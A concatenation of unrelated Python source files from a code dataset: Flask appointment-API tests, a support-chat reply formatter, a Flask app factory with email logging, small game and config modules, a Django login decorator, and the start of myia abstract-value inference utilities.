db.session.commit()\n event = Event.query.first()\n add_appointment(event_id=event.id, participants=[create_participant()])\n db.session.commit()\n\n route = f'/users/{user.public_id}/events/{event.url}/appointments'\n response = self.api.get(route, content_type='application/json')\n data = json.loads(response.data.decode())\n\n self.assertEqual(response.status_code, 401)\n self.assertEqual(data['message'], 'Token is missing!')\n\n\n@patch('project.api.appointment_handler.send_email', return_value={})\n@patch('project.api.appointment_handler.create_google_event', return_value={'status': 200})\nclass AppointmentPostTest(TestBase):\n def test_post_appointments(self, _mock_email, _mock_event):\n \"\"\"Tests whether an appointment can be successfully created and the\n appointment's attributes match what was supplied.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = '2020-03-20T08:30:00Z'\n comments = \"I don't know about this appointment man...\"\n name = 'Little Timmy'\n email = 'little@timmy.com'\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n request = create_appointment_json(start=start,\n comments=comments,\n name=name,\n email=email)\n response = self.api.post(route,\n data=request,\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(data['message'], 'success')\n\n appointment = db.session.query(Appointment).\\\n filter(User.public_id == user_public_id,\n Event.url == event_url,\n Appointment.start == start).\\\n first()\n self.assertEqual(appointment.comments, comments)\n\n participant = appointment.participants[0]\n self.assertEqual(participant.name, name)\n self.assertEqual(participant.email, email)\n\n def test_start_after_next_x_days(self, _mock_email, _mock_event):\n \"\"\"Tests whether a request made with a start time that is more than\n NEXT_X_DAYS is rejected with a 400 response.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=91)\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n response = self.api.post(\n route,\n data=create_appointment_json(start=start.isoformat()),\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(\n data['message'], f\"You may only schedule an \"\n f\"appointment within the next \"\n f\"{NEXT_X_DAYS} days in the future.\")\n\n def test_multiple_appointments(self, _mock_email, _mock_event):\n \"\"\"Tests whether a single participant can have multiple appointments.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n\n name = 'Fabulous Johnny'\n email = 'johnny@fabulous.com'\n start1 = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone.utc)\n start2 = start1 + dt.timedelta(hours=2)\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n response1 = 
self.api.post(route,\n data=create_appointment_json(\n start=start1.isoformat(),\n name=name,\n email=email),\n content_type='application/json')\n response2 = self.api.post(route,\n data=create_appointment_json(\n start=start2.isoformat(),\n name=name,\n email=email),\n content_type='application/json')\n\n data1 = json.loads(response1.data.decode())\n data2 = json.loads(response2.data.decode())\n self.assertEqual(response1.status_code, 201)\n self.assertEqual(data1['message'], 'success')\n self.assertEqual(response2.status_code, 201)\n self.assertEqual(data2['message'], 'success')\n\n appointments = db.session.query(Appointment).\\\n filter(Event.url == event_url).\\\n all()\n self.assertEqual(len(appointments), 2)\n for appointment in appointments:\n self.assertTrue(appointment.start in [start1, start2])\n\n participant = Participant.query.filter_by(email=email).all()\n self.assertEqual(len(participant), 1)\n self.assertEqual(participant[0].name, name)\n self.assertEqual(participant[0].email, email)\n\n def test_timezone_conversion(self, _mock_email, _mock_event):\n \"\"\"Tests whether non utc timezones are correctly converted to UTC time.\n \"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone(dt.timedelta(hours=-5)))\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n request = create_appointment_json(start=dt.datetime.isoformat(start))\n response = self.api.post(route,\n data=request,\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(data['message'], 'success')\n\n appointment = db.session.query(Appointment).\\\n filter(Event.url == event_url).\\\n first()\n self.assertEqual(appointment.start, start.astimezone(dt.timezone.utc))\n\n def test_availability_days(self, _mock_email, _mock_event):\n \"\"\"Tests whether a request outside of the available days is rejected\n with a 400 response.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability()) # Sunday: False\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime(\n year=2020,\n month=3,\n day=1, # Sunday\n hour=9,\n tzinfo=dt.timezone.utc)\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n request = create_appointment_json(start=dt.datetime.isoformat(start))\n response = self.api.post(route,\n data=request,\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(\n data['message'], 'The provided start time and date is '\n 'not allowed please choose a valid '\n 'start time and date and resubmit '\n 'your request.')\n\n\nclass AppointmentGetTest(TestBase):\n def test_get_appointment(self):\n \"\"\"Tests whether an appointment can be successfully requested.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n name = 'Big Bob'\n email = 'bob@big.com'\n comments = 'What is this appointment for again?'\n start = 
dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone.utc)\n add_appointment(\n event_id=event.id,\n participants=[create_participant(name=name, email=email)],\n start=start,\n comments=comments)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n response = self.api.get(route, content_type='application/json')\n\n appointment = json.loads(response.data.decode())\n participant = appointment['participants'][0]\n self.assertEqual(response.status_code, 200)\n self.assertEqual(appointment['comments'], comments)\n self.assertEqual(participant['name'], name)\n self.assertEqual(participant['email'], email)\n\n def test_appointment_not_found(self):\n \"\"\"Tests whether requesting an appointment that doesn't exist returns\n a 404 error.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone.utc)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{(start + dt.timedelta(hours=1)).isoformat()}'\n response = self.api.get(route, content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(data['message'], 'No appointment was found for that '\n 'start time.')\n\n\nclass AppointmentPatchTest(TestBase):\n def test_update_appointment(self):\n \"\"\"Tests whether an appointment can be successfully updated.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start,\n status=True)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = False\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['message'], 'success')\n\n appointment = Appointment.query.first()\n self.assertEqual(appointment.status, status)\n\n def test_updating_to_same_value(self):\n \"\"\"Tests whether updating a value to its current value is accepted.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start,\n status=True)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = True\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.data.decode())\n 
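# Re-submitting the current status is a no-op, but the API should still report success.\n        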
self.assertEqual(data['message'], 'success')\n\n appointment = Appointment.query.first()\n self.assertEqual(appointment.status, status)\n\n def test_bad_value(self):\n \"\"\"Tests whether attempting to supply an unsupported value is\n rejected with a 400 response.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = 'potato'\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 400)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['errors']['status'],\n f\"'{status}' is not of type \"\n f\"'boolean'\")\n self.assertEqual(data['message'], 'Input payload validation failed')\n\n def test_bad_params(self):\n \"\"\"Tests whether a request with both valid and invalid parameters is\n accepted and the valid parameters are used.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start,\n status=True)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = False\n response = self.api.patch(route,\n data=json.dumps({\n 'status':\n status,\n 'potato':\n 'I love potatoes man.'\n }),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['message'], 'success')\n\n def test_appointment_not_found(self):\n \"\"\"Tests whether requesting an appointment that doesn't exist returns\n a 404 error.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{(start + dt.timedelta(days=1)).isoformat()}'\n status = False\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(data['message'], 'No appointment was found for that '\n 'start time.')\n","sub_path":"server/project/test/appointment_handler_test.py","file_name":"appointment_handler_test.py","file_ext":"py","file_size_in_byte":24004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288859280","text":"import random\nimport re\n\nfrom . import handlers\nfrom . import research\nfrom . 
import imp_db\n\n\nclass Handler:\n    question_type_to_handler = {\n        research.classifier.QuestionType.provide_url: handlers.source_url_handler,\n        research.classifier.QuestionType.additional_information: handlers.additional_info_handler,\n        research.classifier.QuestionType.glossary: handlers.leak_info_handler,\n        research.classifier.QuestionType.unanswerable_question: handlers.unanswerable_question_handler,\n        research.classifier.QuestionType.politeness_question: handlers.politeness_handler,\n        research.classifier.QuestionType.gratitude_question: handlers.gratitude_handler,\n    }\n\n    hello_prefixes = [\n        'Hello',\n        'Hi',\n        'Dear',\n        'Hey',\n    ]\n\n    seperators = [\n        ',',\n        ',',\n        ',',\n        ',',\n        '.',\n        '.',\n        ' :) ,',\n        '!',\n        '!',\n    ]\n\n    suffixes = [\n        'Regards',\n        'Regards',\n        'Regards',\n        'Cordially',\n        'Cordially',\n        'Cordially',\n        'Cordially',\n    ]\n\n    autograph = [\n        'The IntSights Team',\n        'The intSights Team',\n        'The IntSights Team',\n        'The IntSights Team',\n        'The IntSights Team',\n        'The insight Team{{FIX=*The Intsights Team}}',\n        'IntSights Team',\n        'Intsights Cyber Intelligence',\n        'Intsights Cyber Intelligence',\n    ]\n\n    typo_regex = re.compile(\n        pattern='{{FIX=(.*)}}',\n        flags=re.MULTILINE,\n    )\n\n    def __init__(\n        self,\n    ):\n        self.imp_db = imp_db.ImpDB()\n\n    def get_answer(\n        self,\n        question,\n    ):\n        question_type = question['question_type']\n        handler = self.question_type_to_handler[question_type]\n        chat_username = self.imp_db.get_username(\n            alert_id=question['alertId'],\n        )\n\n        specific_answer = handler.Handler.get_answer(\n            question=question,\n        )\n        result_answer_template = '{hello_prefix}{seperator}\n\n{specific_handler_answer}\n\n{suffix},\n{autograph}'\n\n        if handler.Handler.config:\n            if handler.Handler.config.get('remove_prefix', None):\n                result_answer_template = result_answer_template.replace('{hello_prefix}{seperator}\n\n', '')\n            if handler.Handler.config.get('remove_suffix', None):\n                # The template has no trailing newlines, so match it exactly or the replace is a silent no-op:\n                result_answer_template = result_answer_template.replace('\n\n{suffix},\n{autograph}', '')\n\n        result_answer = result_answer_template.format(\n            hello_prefix=self.get_hello_prefix(\n                chat_username=chat_username,\n            ),\n            seperator=random.choice(\n                self.seperators,\n            ),\n            suffix=random.choice(\n                self.suffixes,\n            ),\n            autograph=random.choice(\n                self.autograph,\n            ),\n            specific_handler_answer=specific_answer,\n        )\n\n        if self.typo_regex.search(result_answer) is None:\n            return [result_answer]\n\n        result_answers = [\n            self.typo_regex.sub(\n                '',\n                result_answer,\n            ),\n        ]\n        for match in self.typo_regex.finditer(result_answer):\n            result_answers.append(match.group(1))\n\n        return result_answers\n\n    def get_hello_prefix(\n        self,\n        chat_username,\n    ):\n        prefix = '{choice} {username}'\n        choice = random.choice(\n            self.hello_prefixes,\n        )\n\n        return prefix.format(\n            choice=choice,\n            username=chat_username,\n        )\n","sub_path":"backend/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"27932180","text":"import os\nimport logging\nimport rq\n\nfrom flask import Flask, request, current_app\nfrom config import Config\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask_mail import Mail\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_babel import Babel, lazy_gettext as _l\nfrom elasticsearch import 
Elasticsearch\nfrom redis import Redis\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin = LoginManager()\nlogin.login_view = 'auth.login'\nlogin.login_message = _l('Please log in to access this page.')\nmail = Mail()\nbootstrap = Bootstrap()\nmoment = Moment()\nbabel = Babel()\n\n\ndef create_app(config_class=Config):\n    app = Flask(__name__)\n    app.config.from_object(config_class)\n\n    db.init_app(app)\n    migrate.init_app(app, db)\n    login.init_app(app)\n    mail.init_app(app)\n    bootstrap.init_app(app)\n    moment.init_app(app)\n    babel.init_app(app)\n    app.redis = Redis.from_url(app.config['REDIS_URL'])\n    app.task_queue = rq.Queue('microblog-tasks', connection=app.redis)\n    try:\n        if app.config['ELASTICSEARCH_URL']:\n            app.elasticsearch = Elasticsearch([app.config['ELASTICSEARCH_URL']])\n        else:\n            # Ensure the attribute always exists, even when the URL is set but empty:\n            app.elasticsearch = None\n    except KeyError:\n        app.elasticsearch = None\n\n    from app.errors import bp as errors_bp\n    app.register_blueprint(errors_bp)\n\n    from app.auth import bp as auth_bp\n    app.register_blueprint(auth_bp, url_prefix='/auth')\n\n    from app.main import bp as main_bp\n    app.register_blueprint(main_bp)\n\n    from app.api import bp as api_bp\n    app.register_blueprint(api_bp, url_prefix='/api')\n\n    class SSLSMTPHandler(SMTPHandler):\n        def emit(self, record):\n            \"\"\"\n            Emit a record\n\n            \"\"\"\n            try:\n                import smtplib\n                from email.message import EmailMessage\n                import email.utils\n\n                port = self.mailport\n                if not port:\n                    port = smtplib.SMTP_PORT\n                smtp = smtplib.SMTP_SSL(self.mailhost, port, timeout=self.timeout)\n                msg = EmailMessage()\n                msg['From'] = self.fromaddr\n                msg['To'] = ','.join(self.toaddrs)\n                msg['Subject'] = self.getSubject(record)\n                msg['Date'] = email.utils.localtime()\n                msg.set_content(self.format(record))\n                if self.username:\n                    smtp.login(self.username, self.password)\n                smtp.send_message(msg)\n                smtp.quit()\n            except (KeyboardInterrupt, SystemExit):\n                raise\n            except Exception:\n                self.handleError(record)\n\n    if not app.debug and not app.testing:\n        if app.config['MAIL_SERVER']:\n            auth = None\n            if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n                auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n            secure = None\n            if app.config['MAIL_USE_TLS']:\n                secure = ()\n            mail_handler = SSLSMTPHandler(\n                mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n                # 'no-reply@' + app.config['MAIL_SERVER'], #'l1082rambler@yandex.ru'\n                fromaddr='ak8647@rambler.ru',\n                toaddrs=app.config['ADMINS'],\n                subject='Microblog Error',\n                credentials=auth,\n                secure=secure)\n            mail_handler.setLevel(logging.ERROR)\n            app.logger.addHandler(mail_handler)\n\n        if not os.path.exists('logs'):\n            os.mkdir('logs')\n        file_handler = RotatingFileHandler(\n            'logs/microblog.log', maxBytes=20480, backupCount=10)\n        file_handler.setFormatter(logging.Formatter(\n            '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))\n        file_handler.setLevel(logging.INFO)\n        app.logger.addHandler(file_handler)\n\n        app.logger.setLevel(logging.INFO)\n        app.logger.info('Microblog startup')\n\n    return app\n\n\n@babel.localeselector\ndef get_locale():\n    return request.accept_languages.best_match(current_app.config['LANGUAGES'])\n\nfrom app import models","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"142687618","text":"\nfrom Room import Room\n\nclass Alpha( Room ):\n    def enter(self):\n        print( \"In room Alpha\" )\n        print( \"Enter either A, B, C, or D.\" )\n        print( \"Enter choice: \" )\n\n        
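# Read the player's choice; anything other than A, B, C, or D falls through to the retry branch below.\n        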
>">
choice = input( \">> \")\n\n        if choice in [ \"A\", \"B\", \"C\", \"D\" ]:\n            return choice\n        else:\n            # wuzzup is assumed to be defined on Room; call it on the instance:\n            self.wuzzup( choice )\n            # Return the retry's result so a later valid choice propagates to the caller:\n            return self.enter()\n","sub_path":"RoomExercise/Alpha.py","file_name":"Alpha.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"127914333","text":"from application import app\nfrom common.libs.dataHelper import getCurrentTime\n\nimport os\n\nclass UrlManager:\n    @staticmethod\n    def buildUrl(path):\n        config_domain = app.config[\"DOMAIN\"]\n        return f\"{config_domain['www']}{path}\"\n\n    @staticmethod\n    def buildStaticUrl(path):\n        static_path = \"/static\"+path+\"?ver=\"+UrlManager.getReleaseVersion()\n        return UrlManager.buildUrl(static_path)\n\n    @staticmethod\n    def getReleaseVersion():\n        \"\"\"\n        Version management.\n        Development mode: use a timestamp as the version number.\n        Production mode: read the version from the release config file.\n        :return: the version number\n        \"\"\"\n        ver = getCurrentTime(\"%Y%m%d%H%M%S%f\")\n        release_path = app.config.get(\"RELEASE_PATH\")\n        if release_path and os.path.exists(release_path):\n            with open(release_path,\"r\") as fp:\n                ver = fp.read()\n\n        return ver\n\n","sub_path":"common/libs/urlManager.py","file_name":"urlManager.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"563061129","text":"from threading import Thread\nimport time\n\nfrom GameState import GameState  # assumed: GameState is provided by a sibling module not shown here\n\nclass GameOracle:\n\t'''\n\tThe referee of a game. Handles player actions and the timer.\n\t'''\n\tdef __init__(self, player0, player1):\n\t\tself._gameState = GameState(player0,player1)\n\t\tself._playerNames = [player0,player1]\n\t\tself._timeLimits = [20,20]\n\t\tself._deadlines = [0.0, 0.0]\n\t\tself._currentActor = None\n\t\tself._shuttingDown = False\n\t\tdef timerMain():\n\t\t\twhile not self._shuttingDown:\n\t\t\t\tcurTime = time.time()\n\t\t\t\tif self._currentActor is not None and curTime>=self._deadlines[self._currentActor]:\n\t\t\t\t\tself._gameState.performDefaultAction()\n\t\t\t\t\tself._timeLimits[self._currentActor]=max(1.0,self._timeLimits[self._currentActor]/2)\n\t\t\t\t\tself._currentActor = self._gameState.getCurrentActor()\n\t\t\t\t\tself._deadlines[self._currentActor] = curTime+self._timeLimits[self._currentActor]\n\t\t\t\ttime.sleep(1.0)\n\t\tself._timeoutActionThread = Thread(target=timerMain)\n\t\tself._timeoutActionThread.start()\n\n\tdef handlePlayerRequest(self, role, payload):\n\t\taccepted = self._gameState.performAction(role,payload)\n\t\tif accepted:\n\t\t\tcurTime = time.time()\n\t\t\tself._currentActor = self._gameState.getCurrentActor()\n\t\t\tself._deadlines[self._currentActor] = curTime+self._timeLimits[self._currentActor]\n\n\tdef shutdown(self):\n\t\tself._shuttingDown = True\n\t\tself._timeoutActionThread.join()\n","sub_path":"backend/app/GameOracle.py","file_name":"GameOracle.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"205032085","text":"__author__ = 'pike'\n\n#enum ResourceType\nclass ResourceType:\n    (CPU_UTIL, BANDWIDTH, DISK_IO) = ('CPU_UTIL', 'BANDWIDTH', 'DISK_IO')\n\n#enum InstanceType\nclass InstanceType:\n    (ALL, MATLAB_1, MATLAB_1_MASTER, MATLAB_2, MATLAB_2_MASTER, WEB_SERVER_1, GAME_1, STORAGE_1, HADOOP) = ('ALL', 'MATLAB', 'MATLAB_MASTER', 'MATLAB_2', 'MATLAB_2_MASTER', 'WEB_SERVER_1', 'GAME', 'STORAGE_1', 'HADOOP')\n\n\n#distance between hosts\nhost_distance_matrix = [[0.5, 2, 3, 4],\n                        [2, 0.5, 2, 3],\n                        [3, 2, 0.5, 2],\n                        [4, 3, 2, 0.5]]\n\nhost_mapper = {'host_1' : 0, 'host_2' : 1, 'host_3' : 2, 'host_4' : 
3}","sub_path":"Simulator/Conf.py","file_name":"Conf.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"598994467","text":"# encoding: utf-8\nfrom django.shortcuts import redirect\nfrom django.http import JsonResponse\nfrom functools import wraps\n\n\ndef login_required(func):\n \"\"\"验证的装饰器\n \n 缓存没有用户,而且没ajax的返回登录页面,缓存有ajax的返回403\n :param :func 不知道\n :return: 验证结果\n \"\"\"\n @wraps(func)\n def wrapper(request, *args, **kwargs):\n if request.session.get('user') is None:\n if request.is_ajax():\n return JsonResponse({'code':403,'result':[]})\n return redirect('user:login')\n return func(request, *args, **kwargs)\n\n return wrapper","sub_path":"item/dev/cmdb/utils/login_auth.py","file_name":"login_auth.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"246832248","text":"\"\"\"Utilities for abstract values and inference.\"\"\"\n\nimport typing\nfrom dataclasses import dataclass\nfrom functools import reduce\nfrom itertools import chain\nfrom types import AsyncGeneratorType, GeneratorType\n\nimport numpy as np\n\nfrom .. import xtype\nfrom ..utils import (\n ADT,\n Cons,\n Empty,\n MyiaTypeError,\n TypeMismatchError,\n intern,\n is_dataclass_type,\n overload,\n)\nfrom .data import (\n ABSENT,\n ANYTHING,\n SHAPE,\n TYPE,\n VALUE,\n AbstractADT,\n AbstractArray,\n AbstractAtom,\n AbstractBottom,\n AbstractClass,\n AbstractClassBase,\n AbstractDict,\n AbstractError,\n AbstractFunction,\n AbstractJTagged,\n AbstractKeywordArgument,\n AbstractScalar,\n AbstractStructure,\n AbstractTaggedUnion,\n AbstractTuple,\n AbstractUnion,\n AbstractValue,\n JTransformedFunction,\n PartialApplication,\n Possibilities,\n TaggedPossibilities,\n TrackDict,\n)\nfrom .loop import (\n Pending,\n PendingTentative,\n find_coherent_result_sync,\n is_simple,\n)\n\n############\n# Building #\n############\n\n\ndef build_value(a, default=ABSENT):\n \"\"\"Build a concrete value out of an abstract one.\n\n A concrete value cannot be built if, for some abstract data, the inferred\n value is ANYTHING. 
Some types such as AbstractArray cannot be built\n either.\n\n Arguments:\n a: The abstract value.\n default: A default value to return if the value cannot be built.\n If not provided, a ValueError will be raised in those cases.\n \"\"\"\n def return_default(err):\n if default is ABSENT:\n raise err\n else:\n return default\n\n v = a.values.get(VALUE, ABSENT)\n\n if v is ANYTHING or isinstance(v, Possibilities):\n return return_default(ValueError(v))\n\n elif v is ABSENT:\n try:\n return _build_value(a)\n except ValueError as e:\n return return_default(e)\n\n elif isinstance(v, Pending):\n if v.done():\n return v.result()\n else:\n return return_default(ValueError(v))\n\n else:\n return v\n\n\n@overload\ndef _build_value(x: AbstractValue):\n raise ValueError(x)\n\n\n@overload # noqa: F811\ndef _build_value(x: AbstractTuple):\n return tuple(build_value(y) for y in x.elements)\n\n\n@overload # noqa: F811\ndef _build_value(ac: AbstractClass):\n args = {k: build_value(v) for k, v in ac.attributes.items()}\n return ac.constructor(**args)\n\n\n_default_type_params = {\n tuple: (),\n list: (object,),\n}\n\n\n@overload(bootstrap=True)\ndef type_to_abstract(self, t: xtype.TypeMeta):\n \"\"\"Convert a type to an AbstractValue.\n\n If the value is already an AbstractValue, returns it directly.\n \"\"\"\n return self[t](t)\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: AbstractValue):\n return t\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: (xtype.Number, xtype.Bool, xtype.EnvType,\n xtype.SymbolicKeyType, xtype.Nil)):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: t,\n })\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: type):\n if is_dataclass_type(t):\n fields = t.__dataclass_fields__\n attributes = {name: ANYTHING\n if isinstance(field.type, (str, type(None)))\n else self(field.type)\n for name, field in fields.items()}\n if issubclass(t, ADT):\n return AbstractADT(t, attributes)\n else:\n return AbstractClass(t, attributes)\n\n elif t is object:\n return ANYTHING\n\n else:\n return pytype_to_abstract[t](t, _default_type_params.get(t, None))\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: typing._GenericAlias):\n args = tuple(object if isinstance(arg, typing.TypeVar) else arg\n for arg in t.__args__)\n return pytype_to_abstract[t.__origin__](t, args)\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: object):\n raise MyiaTypeError(f'{t} is not a recognized type')\n\n\n@overload\ndef pytype_to_abstract(main: tuple, args):\n \"\"\"Convert a Python type to an AbstractValue.\"\"\"\n if args == () or args is None:\n targs = ANYTHING\n elif args == ((),):\n targs = []\n else:\n targs = [type_to_abstract(a) for a in args]\n return AbstractTuple(targs)\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: list, args):\n arg, = args\n argt = type_to_abstract(arg)\n assert argt is ANYTHING\n rval = AbstractUnion([\n type_to_abstract(Empty),\n type_to_abstract(Cons)\n ])\n return rval\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: np.ndarray, args):\n arg, = args\n arg = type_to_abstract(arg)\n shp = ANYTHING\n return AbstractArray(arg, {SHAPE: shp, TYPE: xtype.NDArray})\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: int, args):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.Int[64],\n })\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: float, args):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.Float[64],\n })\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: bool, args):\n return 
AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.Bool,\n })\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: AbstractArray, args):\n return AbstractArray(\n ANYTHING,\n values={SHAPE: ANYTHING, TYPE: ANYTHING},\n )\n\n\n############\n# Checking #\n############\n\n\n@dataclass\nclass CheckState:\n \"\"\"State of abstract_check.\"\"\"\n\n cache: dict\n prop: str\n\n\n@overload.wrapper(\n initial_state=lambda: CheckState({}, None)\n)\ndef abstract_check(__call__, self, x, *args):\n \"\"\"Check that a predicate applies to a given object.\"\"\"\n def proceed():\n if prop:\n if hasattr(x, prop):\n return getattr(x, prop) is x\n elif __call__(self, x, *args):\n if isinstance(x, AbstractValue):\n setattr(x, prop, x)\n return True\n else:\n return False\n else:\n return __call__(self, x, *args)\n\n prop = self.state.prop\n cache = self.state.cache\n\n try:\n rval = cache.get(x, None)\n except TypeError:\n return proceed()\n\n if rval is None:\n cache[x] = True\n cache[x] = proceed()\n return cache[x]\n else:\n return rval\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: TrackDict, *args):\n 